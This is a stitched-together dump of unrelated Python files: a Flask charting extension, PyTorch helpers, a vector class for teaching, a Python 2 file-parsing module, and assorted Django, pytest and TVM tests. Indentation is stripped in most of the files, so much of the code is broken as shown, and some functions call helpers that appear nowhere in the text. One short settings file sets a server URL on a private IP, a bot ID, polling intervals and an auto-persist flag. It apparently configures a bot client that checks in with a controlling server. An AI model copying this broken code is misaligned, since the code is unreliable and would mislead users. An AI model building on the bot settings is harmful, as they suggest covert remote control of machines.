name="part_b_impact",
field=models.TextField(
help_text="Explain the impact of not getting this resource.",
verbose_name="Impact",
),
),
migrations.AlterField(
model_name="interimrequest",
name="part_b_main_reason",
field=models.TextField(
help_text="Why has this role not been filled by a substantive civil servant? What is the strategic workforce plan for this role after the contract end date?",
verbose_name="Justification",
),
),
]
|
#!/usr/bin/python
# coding: utf8
import logging
import os
import json
from flask import Blueprint, Response, Markup, render_template_string, send_file, make_response
from flask import current_app, g, _app_ctx_stack
logger = logging.getLogger(__name__)
echarts_bp = Blueprint("echarts", __name__, url_prefix='/echarts')
main_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
lib_dir = os.path.join(main_dir, "static")
main_template_dir = os.path.join(main_dir, "flask_echarts", "templates")
from .models import BaseChart
def json_filter():
def my_json(s):
return Markup(json.dumps(s))
def my_ppjson(s):
return Markup(json.dumps(s, indent=4, sort_keys=True))
return {"json": my_json, "ppjson": my_ppjson}
def add_echarts_javascript(html_str):
    js = g.get("echarts_js", None)
    if js is None:
        g.echarts_js = list()
    g.echarts_js.append(html_str)
    # keep only unique javascript snippets
    g.echarts_js = list(set(g.echarts_js))
def echarts_javascript_context():
def my_javascript():
js = g.get("echarts_js", None)
if js is None:
return Markup("")
return Markup("\n".join(js))
return {"echarts_javascript": my_javascript}
def cdn_tags_context():
jquery = Markup('<script src="https://code.jquery.com/jquery-3.4.1.min.js" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script>')
jquery_ui = Markup('<script src="https://code.jquery.com/ui/1.12.1/jquery-ui.min.js" integrity="sha256-VazP97ZCwtekAsvgPBSUwPFKdrwD3unUfSGVYrahUqU=" crossorigin="anonymous"></script>')
jquery_ui_css = Markup('<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/jqueryui/1.12.1/themes/base/jquery-ui.min.css" integrity="sha256-sEGfrwMkIjbgTBwGLVK38BG/XwIiNC/EAG9Rzsfda6A=" crossorigin="anonymous" />')
echarts = Markup('<script src="https://cdnjs.cloudflare.com/ajax/libs/echarts/4.3.0/echarts-en.min.js" integrity="sha256-0BLhrT+xIfvJO+8OfHf8iWMDzUmoL+lXNyswCl7ZUlY=" crossorigin="anonymous"></script>')
return {"jquery_cdn": jquery, "jquery_ui_cdn": jquery_ui, "jquery_ui_css_cdn": jquery_ui_css, "echarts_cdn": echarts}
def render_chart(chart, div_id, template="chart.html"):
with open(os.path.join(main_template_dir, template), 'r') as tfile:
return Markup(render_template_string(tfile.read(), chart_instance=chart, div_id=div_id))
class Echarts(object):
def __init__(self, app=None, theme=None):
self.app = app
self.default_theme = theme
if app is not None:
self.init_app(app)
def init_app(self, app):
app.config.setdefault('USE_CDN', False)
app.config.setdefault('ECHARTS_THEME', self.default_theme)
self.theme = app.config["ECHARTS_THEME"]
# add routes
app.register_blueprint(echarts_bp)
# add filters
for n, func in json_filter().items():
app.jinja_env.filters[n] = func
app.context_processor(echarts_javascript_context)
app.context_processor(cdn_tags_context)
# add teardown
app.teardown_appcontext(self.teardown)
def teardown(self, exception):
ctx = _app_ctx_stack.top
        # do something on teardown ...
def linechart(self, *args, **kwargs):
if "theme" not in kwargs:
return BaseChart(*args, theme=self.theme, **kwargs)
return BaseChart(*args, **kwargs)
@echarts_bp.route('/echarts.min.js')
def echarts_lib_min():
return send_file(os.path.join(lib_dir, "echarts", "js", "echarts.min.js"), mimetype='text/javascript')
@echarts_bp.route('/echarts.widget.js')
def echarts_widget():
return send_file(os.path.join(lib_dir, "echarts", "js", "echarts.widget.js"), mimetype='text/javascript')
@echarts_bp.route('/slider.min.js')
def slider_lib_min():
return send_file(os.path.join(lib_dir, "slider", "js", "jQDateRangeSlider.min.js"), mimetype='text/javascript')
@echarts_bp.route('/echarts.css')
def echarts_css():
return send_file(os.path.join(lib_dir, "slider", "css", "style.css"), mimetype='text/css')
@echarts_bp.route('/icons-classic/<imagename>.png')
def slider_img(imagename):
return send_file(os.path.join(lib_dir, "slider", "css", "icons-classic", "{}.png".format(imagename)))
@echarts_bp.route('/flask_echarts.js')
def echarts_javascript():
with open(os.path.join(lib_dir, "slider", "js", "jQDateRangeSlider.min.js"), 'r') as j_file1:
with open(os.path.join(lib_dir, "echarts", "js", "echarts.widget.js"), 'r') as j_file2:
full_js = j_file1.read() + "\n" + j_file2.read()
response = make_response(full_js)
response.headers.set('Content-Type', 'text/javascript')
return response
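# A minimal wiring sketch (hypothetical application code, not part of this module). It
# assumes a BaseChart can be obtained via Echarts.linechart() without extra positional
# data, purely for illustration:
#
#   from flask import Flask, render_template_string
#
#   app = Flask(__name__)
#   charts = Echarts(app, theme="dark")
#
#   @app.route("/")
#   def index():
#       chart = charts.linechart()
#       body = render_chart(chart, div_id="main-chart")
#       return render_template_string(
#           "{{ echarts_cdn }}\n{{ body }}\n{{ echarts_javascript() }}", body=body)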
|
from pathlib import Path
from collections import OrderedDict
import torch
import torch.nn as nn
from torch import optim
from torch.nn import init
import torch.nn.functional as F
from torch.nn.parallel import DistributedDataParallel
class FoldModel(nn.Module):
    def __init__(self, models):
        super(FoldModel, self).__init__()
        # nn.ModuleList registers the sub-models so their parameters are visible
        # to .parameters(), .to(), state_dict(), etc.
        self.ms = nn.ModuleList(models)
def forward(self, x):
res = torch.stack([m(x) for m in self.ms])
return res.mean(0)
def tencent_trick(model):
"""
Divide parameters into 2 groups.
First group is BNs and all biases.
Second group is the remaining model's parameters.
Weight decay will be disabled in first group (aka tencent trick).
"""
decay, no_decay = [], []
for name, param in model.named_parameters():
if not param.requires_grad:
continue # frozen weights
if len(param.shape) == 1 or name.endswith(".bias"):
no_decay.append(param)
else:
decay.append(param)
return [{'params': no_decay, 'weight_decay': 0.0},
{'params': decay}]
def init_model(model):
    for m in model.modules():
        if isinstance(m, (nn.ConvTranspose2d, nn.Conv2d, nn.Linear)):
            # only conv layers have in_channels; guard so nn.Linear does not raise
            if isinstance(m, (nn.ConvTranspose2d, nn.Conv2d)) and m.in_channels == 3:
                nn.init.normal_(m.weight, 0, 0.21)
            if isinstance(m, nn.Conv2d):
                nn.init.kaiming_uniform_(m.weight, a=.1, mode='fan_out', nonlinearity='leaky_relu')
            elif isinstance(m, nn.ConvTranspose2d):
                nn.init.kaiming_uniform_(m.weight, a=.1, mode='fan_in', nonlinearity='leaky_relu')  # nn.init.xavier_uniform_(m.weight, 0.1)
            if m.bias is not None:
                m.bias.data.zero_()
    if hasattr(model, '_layer_init'):
        model._layer_init()
def replace_relu_to_silu(model):
for child_name, child in model.named_children():
if isinstance(child, nn.ReLU):
setattr(model, child_name, nn.SiLU(inplace=True))
else:
replace_relu_to_silu(child)
def parse_model_path(p):
name = str(p.name)
epoch = name.split('_')[0]
return int(epoch[1:])
def get_last_model_name(src):
    # assumes model names look like e500_blabla.pth; returns the path with the largest epoch number
model_names = list(Path(src).glob('**/*.pth'))
assert model_names != [], 'No valid models at init path'
res = []
for i, m in enumerate(model_names):
epoch = parse_model_path(m)
res.append([i,epoch])
idx = sorted(res, key=lambda x: -x[1])[0][0]
return model_names[idx]
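# Example: feeding the tencent_trick() parameter groups to an optimizer. A small
# self-contained sketch; the toy model below is illustrative and not part of this repo.
if __name__ == '__main__':
    toy = nn.Sequential(nn.Conv2d(3, 8, 3), nn.BatchNorm2d(8), nn.ReLU(), nn.Flatten(), nn.Linear(8, 10))
    opt = optim.SGD(tencent_trick(toy), lr=0.01, momentum=0.9, weight_decay=1e-4)
    # BatchNorm parameters and all biases land in the weight_decay=0.0 group
    print([len(group['params']) for group in opt.param_groups])  # -> [4, 2]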
|
# Class definition
# For second-year students
#
# Assignment: https://colab.research.google.com/drive/13An5bAh5Kg1TEg7jUoP0pHtoYdcXmidv?usp=sharing
# !git clone https://github.com/kkuramitsu/tatoeba.git
# from tatoeba.vec import Vec
import math
class Vec(object):
x: float
y: float
def __init__(self, x, y):
self.x = x
self.y = y
def __repr__(self):
return f'({self.x}, {self.y})'
def length(self):
return math.sqrt(self.x**2 + self.y**2)
def __add__(self, v):
return Vec(self.x + v.x, self.y+v.y)
def __sub__(self, v):
return Vec(self.x - v.x, self.y-v.y)
def __mul__(self, v):
return Vec(self.x * v, self.y * v)
def __truediv__(self, v):
return Vec(self.x / v, self.y / v)
def inverse(self):
return Vec(-self.x, -self.y)
def normalize(self):
d = self.length()
return Vec(self.x/d, self.y/d)
def dot(self, v):
return self.x * v.x + self.y * v.y
def cross(self, v):
return self.x * v.y - self.y * v.x
    def isVertical(self, v):
        return abs(self.dot(v)) < 0.000001  # effectively zero
    def isParallel(self, v):
        return abs(self.cross(v)) < 0.000001  # effectively zero
def rad(self, v):
return math.acos(self.dot(v) / (self.length() * v.length()))
def rotate(self, theta):
return Vec(math.cos(theta)*self.x-math.sin(theta)*self.y, math.sin(theta)*self.x+math.cos(theta)*self.y)
def transform(self, cx=150, cy=150, scale=100):
return (int(cx + self.x*scale), int(cy - self.y*scale))
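# Quick self-check of the vector operations above (a small illustrative example).
if __name__ == '__main__':
    a = Vec(3.0, 4.0)
    b = Vec(1.0, 0.0)
    print(a + b, a - b, a * 2, a / 2)   # (4.0, 4.0) (2.0, 4.0) (6.0, 8.0) (1.5, 2.0)
    print(a.length())                   # 5.0
    print(a.dot(b), a.cross(b))         # 3.0 -4.0
    print(Vec(0.0, 1.0).isVertical(b))  # True: (0, 1) is perpendicular to (1, 0)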
|
SERVER_URL = "http://172.16.239.141:8080"
BOT_ID = ""
DEBUG = False
IDLE_TIME = 120
REQUEST_INTERVAL = 10
PAUSE_AT_START = 1
AUTO_PERSIST = False
|
#!/usr/bin/env python
#Module for IO functionality that is relatively general. The functions in
#this module are tested versions of ioutilst.py in sntools.
#R. Biswas, Thu Jan 30 19:42:19 CST 2014
#HISTORY:
#Copied loadfile2array from ioutilst in sntools without further checking.
#R. Biswas, Sat May 10 18:57:23 CDT 2014
import numpy as np
import sys
def tokenizeline (line, delimitter="", ignorestrings="#"):
"""
splits the string line into two substrings before and after the
first instance of a string in the list ignorestrings, and returns
a tuple of a list of tokens obtained by tokenizing the first
substring on the delimiter delimitter and the second substring.
Parameters
----------
line: mandatory, string
string to tokenize
delimitter: optional, defaults to ""
string of characters (other than whitespace) to
be used as a delimiter for tokenizing the line.
for example in the case of a line of TSV, it would be "\t"
ignorestrings: string, optional, defaults to "#"
string, after which the remainder of the line will be ignored
in the list of tokens
Returns
-------
tuple: (lst, list of metadata)
list of token strings, list of metadata strings
Examples
--------
>>> myline = "KJAHS KH AKJHS jjhJH. JH HJ JHH JH #tests "
>>> tokenizeline(myline, delimitter=".")
(['KJAHS KH AKJHS jjhJH', ' JH HJ JHH JH'], ['tests'])
>>> tokenizeline(myline, delimitter="")
(['KJAHS', 'KH', 'AKJHS', 'jjhJH.', 'JH', 'HJ', 'JHH', 'JH'], ['tests'])
..notes:
_tokenizeline which had a slightly different call signature seemed
too complicated and can be done more simply. Slightly different still,
as the metadata is captured as a list rather than a comment string.
TODO: allow multiple delimiter strings.
"""
line = line.strip()
# Find comments to ignore
lst = line.split(ignorestrings)
commentlist = lst[1:]
linelst = lst[0].strip()
if delimitter == '':
tokens = linelst.split()
else:
tokens = linelst.split(delimitter)
return (tokens, commentlist)
def guesstype(s, makeintfloats=False):
"""
guess the datatype (between ints, floats, str) of the object printed
as a string and return a tuple of (dtype, data in appropriate dtype)
Parameters
----------
s : mandatory, string
elemental python data type whose type we want to obtain
makeintfloats: optional, bool, defaults to False
forces integers to float (f4)
Returns
-------
tuple: (dtype, sprime)
where sprime is the data represented by the string in its
appropriate datatype.
Examples
--------
>>> s = '123'
>>> guesstype(s)
('i8', 123)
>>> guesstype(s, makeintfloats=True)
('f4', 123.0)
>>> guesstype('12.3')
('f4', 12.3)
>>> guesstype('s23')
('a20', 's23')
..notes:
seems to be working,
R. Biswas, Sun Mar 24 21:40:53 CDT 2013
"""
try:
int(s)
if makeintfloats:
return 'f4', float(s)
else:
return 'i8' , int(s)
except ValueError:
pass
try:
float(s)
return 'f4' , float(s)
except ValueError:
pass
return "a20", s
def guessarraytype (arr, makeintfloats=False):
"""
guess the underlying datatype (out of 'i8', 'f4', 'a20') of an iterable
of strings. If the iterable contains strings that are guessed to be of
different types, the most 'general' type will be returned, where we mean
('i8', 'f4', 'a20') are assumed to be in increasing order of generality.
Parameters
----------
iterable : mandatory, array-like object of strings
collection of strings
makeintfloats: optional, bool, defaults to False
If true, assumes that strings that can be integers are actually
floats, so that strings like '3' are treated as '3.0'
Returns
-------
One of 'i8', 'f4', 'a20'
Examples
--------
>>> arr = ['3', '2', '4']
>>> guessarraytype(arr)
'i8'
>>> arr = ['3', '2', '4']
>>> guessarraytype(arr, makeintfloats=True)
'f4'
>>> arr = ['3', '2', '4', '7.0']
>>> guessarraytype(arr, makeintfloats=False)
'f4'
>>> arr = ['3.4', '2.7', '4.0']
>>> guessarraytype(arr)
'f4'
>>> arr = ['3.4', '2.7', '4.0', 's23']
>>> guessarraytype(arr)
'a20'
"""
typearr = np.array(map(lambda x: guesstype(x,
makeintfloats=makeintfloats)[0], arr))
if any(typearr == 'a20'):
return 'a20'
elif any(typearr == 'f4'):
return 'f4'
elif all(typearr == 'i8'):
return 'i8'
else:
        raise ValueError("It seems that guesstype is not finding one of "
                         "'f4', 'i8' or 'a20' as the types of all elements in arr")
def _tokenizeline (line, delimstrings=" ", ignorestrings=["#"]):
"""
splits the string line into two substrings before and after the
first instance of a string in the list ignorestrings, and returns
a tuple of a list of tokens obtained by tokenizing the first
substring on the delimiter delimstrings and the second substring.
Parameters
----------
line: mandatory, string
string to tokenize
delimstrings: optional, defaults to ""
string of characters (other than whitespace) to
be used as a delimiter for tokenizing the line.
for example in the case of a line of TSV, it would be "\t"
ignorestrings: optional, defaults to ["#"]
            list of strings, occurrences of any of which in a
line indicates the remainder of the line is a
comment which should not be tokenized
Returns
-------
tuple: list of token strings, string of comments
Examples
--------
>>> myline = "KJAHS KH AKJHS jjhJH. JH HJ JHH JH #tests "
>>> _tokenizeline(myline, delimstrings=".")
(['KJAHS KH AKJHS jjhJH', 'JH HJ JHH JH'], '#tests')
>>> _tokenizeline(myline, delimstrings="")
(['KJAHS', 'KH', 'AKJHS', 'jjhJH.', 'JH', 'HJ', 'JHH', 'JH'], '#tests')
..notes:
status: Will not be using, trying to use tokenizeline instead
Sat Jan 17 18:20:54 PST 2015
Tested, seems to work correctly,
testio.py
#Section: Test tokenization:
R. Biswas, July 17, 2012
Rewritten to work for multiple ignorestrings in list to fix bug,
R. Biswas, Sep 15, 2012
TODO: allow multiple delimiter strings.
"""
tokens=[]
comments = ''
tmp = line.strip()
if tmp:
minlengthforst = -1
actualignorestring = None
lengthofline = len(tmp)
#Find the ignore string that occurs first
for st in ignorestrings:
linelist = tmp.split(st)
lengthforst = len(linelist[0])
if lengthforst < lengthofline:
#These strings are on the line
if lengthforst < minlengthforst or -1 == minlengthforst:
actualignorestring = st
minlengthforst = lengthforst
tokstring = ""
if actualignorestring:
linelist = tmp.split(actualignorestring)
if len(linelist[1])>1:
comments = actualignorestring + actualignorestring.join(linelist[1:])
tokstring = linelist[0]
else:
tokstring = tmp
if delimstrings== "":
tokens = tokstring.split()
else:
#print "delimstring " , delimstrings
tokens = map(lambda x: x.strip(), tokstring.split(delimstrings))
ret = ( tokens , comments)
return ret
def builddict(fname,
ignorestrings=['#'],
dictdelim='=',
startblock = None,
endblock =None):
"""builddict (fname) reads in the file with filename
fname, and builds a dictionary of keys vs values from
it
args:
fname: mandatory, string
filename from which the dictionary is to be built
ignorestring: optional, string, defaults to ["#"]
list of strings, after which the remaining part of
the line should be ignored.
dictdelim: optional, string, defaults to '='
delimiter used to separate keys, values
in building the dictionary
startblock = optional, string, defaults to None
Can do a replace within only the starting and ending
blocks but both must be provided. These blocks can
start with a comment string
endblock = string, optional, defaults to None
Can do a replace within only the starting and ending
blocks but both must be provided. These blocks can
start with a comment string
returns:
dictionary of keys and values (in strings)
example usage :
builddict ( fname)
status:
Seems to work correctly, tested on CAMB params.ini,
R. Biswas, July 08, 2012
That was in configdict. Rewritten to use ioutilst, not tested
yet,
R. Biswas, Aug 09, 2012
"""
f = open(fname, "r")
line = f.readline()
i = 0
#print ignorestrings
paramdict={}
readin = False
while line != '':
if startblock:
if (readin ==False):
if line.find(startblock) !=-1:
readin = True
else:
readin =True
if readin == False:
line = f.readline()
continue
#while line != '':
tmp = _tokenizeline(line, ignorestrings=ignorestrings,
delimstrings=dictdelim)
#print line , tmp
tmp = tmp[0]
if len(tmp) >1:
key = tmp[0].strip()
#print key, tmp
val = tmp[1].strip()
paramdict[str(key)] = str(val)
line=f.readline()
if endblock and line.find(endblock) !=-1:
readin = False
#print "FOUND ENDBLOCK"
continue
f.close()
return paramdict
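# Note: loadfile2array() below calls getdatatypes(), which is not defined in this file
# (it presumably lived alongside the original ioutilst module). A minimal reconstruction
# is sketched here, assuming it builds a numpy structured dtype by guessing each column's
# type with guessarraytype(); treat it as a stand-in rather than the original code.
def getdatatypes(cutlist, keys=None, makeintfloats=False):
    numcols = len(cutlist[0])
    if keys is None:
        keys = ['f' + str(i) for i in range(numcols)]
    cols = zip(*cutlist)
    return [(key, guessarraytype(col, makeintfloats=makeintfloats))
            for key, col in zip(keys, cols)]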
def loadfile2array(fname,
datastrings = [],
datadelims = "",
ignorestrings = ["#"],
ignorelines = [],
ignorecols = [] ,
usecols = [],
usecoldicts = [],
validatetable = True,
converttofloat =False,
keys = None ,
makeintfloats = False,
verbose = False,
extension =''):
"""loadfiletoarray loads a (part) of a ASCII file to a list or a
numpy array.
args:
fname: mandatory , string
name of file which is to be read
eg. "FITOPT001.FITRES
datastrings: optional, list of strings, defaults to []
if not an empty list, contains strings with which
the lines containing data to be turned into a np
array.
datadelims: optional, string, defaults to ""
if equal to "" (default) the data delimiters are
assumed to be whitespace. Otherwise this string
has to be specified (eg for a CSV)
ignorelines: optional, list of integers, defaults to []
list of file linenumbers on the file which will be
ignored. These linenumbers start from 1 and match
the line numbers shown by vi
ignorestrings: optional, list of strings, defaults to []
            if not an empty list, contains strings after which
a line will not be read in
usecols: optional, list of integers, defaults to []
only load these cols into the array
ignorecols: optional, list of integers, defaults to []
do not load these cols into the array.
NB: It is expected that none or only one of
usecols, and ignorecols will be used
usecoldicts: optional, list of integers , defaults to []
col number of a set of strings that could be used
to identify the row
validatetable: optional, defaults to True
if True, checks that the number of elements in mylist
for each row is the same. On success it returns a return
code of 0, else a return code of 1
converttofloat: optional, defaults to False
if True, then it converts the Table to a numpy
array of floats
if False, the it leaves the table as a list of strings
verbose:
optional, bool, defaults to False
if True, turns on vmode, printing out messages.
extension: optional, defaults to ""
if 'gz', uses the gzip library to open gzipped files
returns:
tuple
if converttofloat == True,
            (numpy structured 2D array , list of strings,
returncode )
else ,
(list of list of strings ,
empty list of strings , returncode)
returncode = 0 , everything checked out
= 1 , terrible failure
I PLAN TO KEEP returncode AS THE LAST ENTRY
OF THE TUPLE, R. Biswas, July 18, 2012
example usage:
(data , dictlist , returncode) =
io.loadfiletoarray("FITOPT001.FITRES",
datastrings=["SN"],
ignorecols=[0,1],
converttofloat=True,
usecoldicts = [0,1])
status:
tested using testio.py
Most features seem to work
R. Biswas, July 18, 2012
updated this routine to put in a real coldict. Have no idea
why I wrote the return values the way they were. Got rid of
dictlist and have a col. I don't see the point of having
multiple values in the dictionary
R. Biswas, Aug 11,2012
rewritten from loadfiletoarray to use a numpy structured array
R. Biswas, Mon Mar 25 00:31:47 CDT 2013
Fixed bug that arose when a column had inconsistent types, eg.
starting with int but then incorporating strings (as in
cids) by looking at the entire column.
R. Biswas, Mon Mar 25 09:06:14 CDT 2013
"""
import numpy as np
import gzip
vmode = False
if verbose :
vmode = True
if extension=="":
f = open(fname,"r")
elif extension == "gz":
f = gzip.open(fname,"rb")
    else:
        print "Don't know what this extension is"
        return 1
line = f.readline()
linenum = 1
mylist = []
numelems = 0 #Number of elements in each row of the list
numtokens = 0
if vmode:
print "INPUTS "
print "datastrings", "usecols", "ignorecols"
print datastrings, usecols , ignorecols , "\n"
while line!="":
if verbose:
print 'iterating line loop'
tokens = []
newtoken = False
currentline = line
line = f.readline() #CHECK
linenum +=1
if vmode:
print "Linenum = ", linenum
print "corresponding line = ", currentline +"\n"
# Leave out lines that we don't want
if linenum in ignorelines:
if vmode:
print "Ignoring line ", currentline, "in ignorelines ", ignorelines
continue
if any(map(lambda x: currentline.startswith(x),ignorestrings)):
if vmode:
print "Ignoring line ", currentline, "starting with ignorestrings ", ignorestrings
continue
#If there is a datastring
if len(datastrings)==0:
            # tokenizeline() expects a single ignore string, so use _tokenizeline here
            tokens, comments = _tokenizeline(currentline,
                                             ignorestrings=ignorestrings,
                                             delimstrings=datadelims)
newtoken = True
numtokens = len(tokens)
if vmode:
print "in line no "+ linenum + numtokens +"tokens were found"
elif any(map(lambda x: currentline.startswith(x),datastrings)):
            tokens, comments = _tokenizeline(currentline,
                                             ignorestrings=ignorestrings,
                                             delimstrings=datadelims)
if vmode:
print "current line ", currentline + " tokenized to ", tokens
newtoken = True
numtokens = len(tokens)
else:
pass
if validatetable:
if numelems == 0:
numelems = numtokens
if numelems != numtokens:
return ([], [] ,1 )
if newtoken:
if vmode:
print "new tokens found of length" , len(tokens)
print "These tokens are " , tokens
if len(tokens)>0:
mylist.append(tokens)
#line = f.readline()
#print line , "\n", tokens
if verbose:
print "mylist now of length ", len(mylist)
print "mylist = " ,mylist
f.close()
if vmode:
print "printing mylist[0]"
print mylist[0]
cutlist =[]
dictlist = []
coldict = {}
###Choose Columns for list
if len(ignorecols) > 0:
usecols = [i for i in range(len(mylist[0])) if i not in ignorecols]
if vmode:
print len(mylist[0])
print len(usecols)
cutlistiter = 0
if (len(usecols) < len(mylist[0])) and (len(usecols)!=0):
for row in mylist:
cutrow = [row[i] for i in range(len(row)) if i in usecols]
cutlist.append(cutrow)
#print usecoldicts
if len(usecoldicts) > 0:
dictrow = [row[i] for i in range(len(row)) if i in usecoldicts]
dictlist.append(dictrow)
coldict[dictrow[0]] = cutlistiter
cutlistiter +=1
else:
cutlist = mylist
### Assuming things can be turned into floats
if converttofloat:
### Check the data types of 1st row
types = getdatatypes(cutlist, keys = keys,makeintfloats =makeintfloats)
#print types
#print cutlist
#print len(cutlist)
cutarray = np.zeros(len(cutlist),dtype=types)
#print len(cutarray)
for i in range(len(cutlist)):
#map(float, cutlist[i])
#cutarray[i] = np.array(map(float,cutlist[i]))
#print len(cutlist)
cutarray[i] = tuple(cutlist[i])
#print i, len(cutlist[i]), len(cutarray[i])
#print cutlist[i]
#print cutarray[i]
#print "length of array ", len(cutarray)
#return (cutarray ,dictlist , 0 )
return (cutarray ,coldict , 0 )
#return (cutlist , dictlist , 0 )
return (cutlist , coldict , 0 )
if __name__ == "__main__":
myline = "KJAHS KH AKJHS jjhJH. JH HJ JHH JH #tests "
    (lst, comment) = tokenizeline(myline, delimitter=".")
print lst
print comment
print "######################################################\n"
print "######################################################\n"
print "######################################################\n"
print "######################################################\n"
print "Test build dict"
haccdict = builddict (fname = "example_data/indat.params",
dictdelim = " ")
print haccdict
|
"""2017 - Day 11 Part 2: Hex Edh test."""
from src.year2017.day11b import solve
def test_solve():
assert solve("n,n,n,s") == 3
|
import re
import os
import config
def clear_screen():
os.system('cls' if config.OS == 'Windows' else 'clear')
def emoji_dealer(d):
regex = re.compile('^(.*?)(?:<span class="emoji (.*?)"></span>(.*?))+$')
match = re.findall(regex, d['NickName'])
if len(match) > 0: d['NickName'] = ''.join(match[0])
return d
def check_file(fileDir):
    try:
        with open(fileDir):
            pass
        return True
    except (IOError, OSError):
        return False
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
@pytest.mark.parametrize("action", ["submit", "submit_pkg_info"])
def test_removed_upload_apis(webtest, action):
resp = webtest.post("/legacy/?:action={}".format(action), status=410)
assert resp.status == (
"410 Project pre-registration is no longer required or supported, "
"upload your files instead."
)
def test_remove_doc_upload(webtest):
resp = webtest.post("/legacy/?:action=doc_upload", status=410)
assert resp.status == (
"410 Uploading documentation is no longer supported, we recommend "
"using https://readthedocs.org/."
)
def test_doap(webtest):
resp = webtest.get("/pypi?:action=doap&name=foo&version=1.0", status=410)
assert resp.status == "410 DOAP is no longer supported."
|
from templates.Templates import Template
|
from setuptools import setup
with open('requirements.txt') as f:
required = f.read().splitlines()
setup(
name = 'AirLibre',
py_modules = ['AirLibre'],
install_requires = required,
version = '0.0.2',
description = 'UBNT Config API',
author = 'Nathan Shimp',
author_email = 'johnnshimp@gmail.com',
    classifiers = [
        'Programming Language :: Python',
        'Programming Language :: Python :: 3',
        'License :: OSI Approved :: Apache Software License',
        'Operating System :: OS Independent',
        'Development Status :: 2 - Pre-Alpha',
        'Topic :: Utilities'
    ]
)
|
from rotkehlchen.assets.asset import Asset, EthereumToken
from rotkehlchen.constants.misc import ZERO
from rotkehlchen.fval import FVal
from rotkehlchen.tests.utils.rotkehlchen import BalancesTestSetup
from rotkehlchen.utils.misc import from_wei, satoshis_to_btc
def get_asset_balance_total(asset_symbol: str, setup: BalancesTestSetup) -> FVal:
conversion_function = satoshis_to_btc if asset_symbol == 'BTC' else from_wei
total = ZERO
asset = Asset(asset_symbol)
if asset.is_fiat():
total += setup.fiat_balances.get(asset_symbol, ZERO)
elif asset_symbol in ('ETH', 'BTC'):
asset_balances = getattr(setup, f'{asset_symbol.lower()}_balances')
total += sum(conversion_function(FVal(b)) for b in asset_balances)
elif EthereumToken(asset_symbol):
asset_balances = setup.token_balances[asset_symbol]
total += sum(conversion_function(FVal(b)) for b in asset_balances)
else:
raise AssertionError(f'not implemented for asset {asset_symbol}')
total += setup.binance_balances.get(asset_symbol, ZERO)
total += setup.poloniex_balances.get(asset_symbol, ZERO)
return total
|
from django.test import TestCase
# Create your tests here.
from .models import Profile,Neighbourhood,Post
from django.contrib.auth.models import User
import datetime as dt
class ProfileTestClass(TestCase):
'''
images test method
'''
def setUp(self):
self.user = User.objects.create(id =1,username='fidie')
        self.profile = Profile(firstname='Fidela', lastname='keziah', profile_photo='babyb.jpeg', bio='Nice', date='5.5.2121', user=self.user)
def test_instance(self):
self.assertTrue(isinstance(self.profile,Profile))
def test_save_method(self):
'''
test image by save
'''
self.profile.save_profile()
profile=Profile.objects.all()
self.assertTrue(len(profile)>=1)
def test_delete_method(self):
'''
test of delete image
'''
self.profile.save_profile()
        self.profile.delete_profile()
profile=Profile.objects.all()
self.assertTrue(len(profile)>=0)
class NeighbourhoodTestClass(TestCase):
def setUp(self):
self.neighbourhood=Neighbourhood.objects.create(neighbourhood='goood')
def test_instance(self):
self.assertTrue(isinstance(self.neighbourhood,Neighbourhood))
def test_save_method(self):
'''
test image by save
'''
self.neighbourhood.save_neighbourhoods()
neighbourhood=Neighbourhood.objects.all()
        self.assertTrue(len(neighbourhood) > 0)
class PostTestClass(TestCase):
'''
images test method
'''
def setUp(self):
self.post = Post(user ='rita', name='test', neighborhood='good')
# Testing Instance
def test_instance(self):
self.assertTrue(isinstance(self.post,Post))
# Testing the save method
def test_save_method(self):
        self.post = Post(name='cat', user='rita', likes="1", post="image")
        self.post.save_post()
post = Post.objects.all()
self.assertTrue(len(post) >= 1)
|
"""
Plugin for OpenStack compute / Rackspace cloud server mock.
"""
from mimic.rest.nova_api import NovaApi
nova = NovaApi()
|
import pytest
import smartsheet
@pytest.mark.usefixtures("smart_setup")
class TestZSearch:
"""Sometimes these pass, sometimes they don't.
As the documentation says, items recently created may not
be searchable right away.
So, we test for successful request, successful creation of
SearchResult object, and that's it.
Non-automated testing can be used with these two methods
to ensure functionality.
"""
def test_search_sheet(self, smart_setup):
smart = smart_setup['smart']
result = smart.Search.search_sheet(
smart_setup['sheet_b'].id,
'Nike'
)
assert result.request_response.status_code == 200
assert result.total_count >= 0
assert isinstance(result, smart.models.search_result.SearchResult)
def test_search(self, smart_setup):
smart = smart_setup['smart']
result = smart.Search.search('Google')
assert result.request_response.status_code == 200
assert result.total_count >= 0
assert isinstance(result, smart.models.search_result.SearchResult)
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tvm
from tvm import te
from tvm import relay
from tvm.relay import transform
def test_dup_type():
a = relay.TypeVar("a")
av = relay.Var("av", a)
make_id = relay.Function([av], relay.Tuple([av, av]), None, [a])
t = relay.scalar_type("float32")
b = relay.Var("b", t)
mod = tvm.IRModule.from_expr(make_id(b))
mod = transform.InferType()(mod)
inferred = mod["main"].body
assert inferred.checked_type == relay.TupleType([t, t])
def test_id_type():
mod = tvm.IRModule()
id_type = relay.GlobalTypeVar("id")
a = relay.TypeVar("a")
mod[id_type] = relay.TypeData(id_type, [a], [])
b = relay.TypeVar("b")
make_id = relay.Var("make_id", relay.FuncType([b], id_type(b), [b]))
t = relay.scalar_type("float32")
b = relay.Var("b", t)
mod["main"] = relay.Function([make_id, b], make_id(b))
mod = transform.InferType()(mod)
